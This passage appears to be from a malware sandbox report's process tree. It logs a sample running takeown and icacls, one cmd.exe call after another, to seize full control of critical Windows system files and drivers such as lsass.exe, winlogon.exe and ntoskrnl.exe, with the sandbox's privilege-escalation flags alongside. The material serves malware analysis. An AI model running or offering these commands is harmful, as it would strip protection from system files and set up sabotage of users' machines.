C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:1104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:1108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Possible privilege escalation attempt
PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:1696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:1616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:1168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:1124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:2356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:1228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:1588
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:2100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵PID:1584
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:1796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵
- Possible privilege escalation attempt
PID:1488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:2172
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:3036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:1804
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:2144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:2008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:3028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:2096
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵PID:1560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:1180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵
- Possible privilege escalation attempt
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:2368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵
- Possible privilege escalation attempt
PID:2764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:2508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit2⤵PID:668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arc.sys3⤵
- Modifies file permissions
PID:2856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:2136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:3000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:1524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Possible privilege escalation attempt
PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit2⤵PID:2084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ataport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit2⤵PID:2764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\b57nd60a.sys3⤵PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:2700
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:1028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit2⤵PID:2580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\blbdrive.sys3⤵
- Modifies file permissions
PID:3212
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:2480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Possible privilege escalation attempt
PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit2⤵PID:3108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltLo.sys3⤵
- Possible privilege escalation attempt
PID:3248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit2⤵PID:3120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltUp.sys3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:3160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit2⤵PID:3200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerId.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit2⤵PID:3240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerWdm.sys3⤵PID:3436
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"3⤵PID:3492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit2⤵PID:3316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbMdm.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"3⤵PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit2⤵PID:3380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbSer.sys3⤵PID:3460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:3416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:3528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Possible privilege escalation attempt
PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:3568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:3608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:3736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:3640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:3708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵
- Modifies file permissions
PID:3908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit2⤵PID:3728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmdide.sys3⤵PID:3892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"3⤵PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:3792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit2⤵PID:3812
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\compbatt.sys3⤵PID:3984
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"3⤵PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit2⤵PID:3848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CompositeBus.sys3⤵PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:3872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit2⤵PID:3920
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crcdisk.sys3⤵PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:3972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:4020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵PID:3216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit2⤵PID:4088
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\discache.sys3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:3232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:2220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:3356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵
- Modifies file permissions
PID:3496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:3396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵PID:668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:3456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:3540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:3628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit2⤵PID:3240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxapi.sys3⤵
- Modifies file permissions
PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit2⤵PID:1692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxg.sys3⤵PID:3412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:2004
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:3692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵
- Possible privilege escalation attempt
PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit2⤵PID:3864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\elxstor.sys3⤵
- Modifies file permissions
PID:3216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:3960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:2012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:3768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:3180
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3348
-
-
-
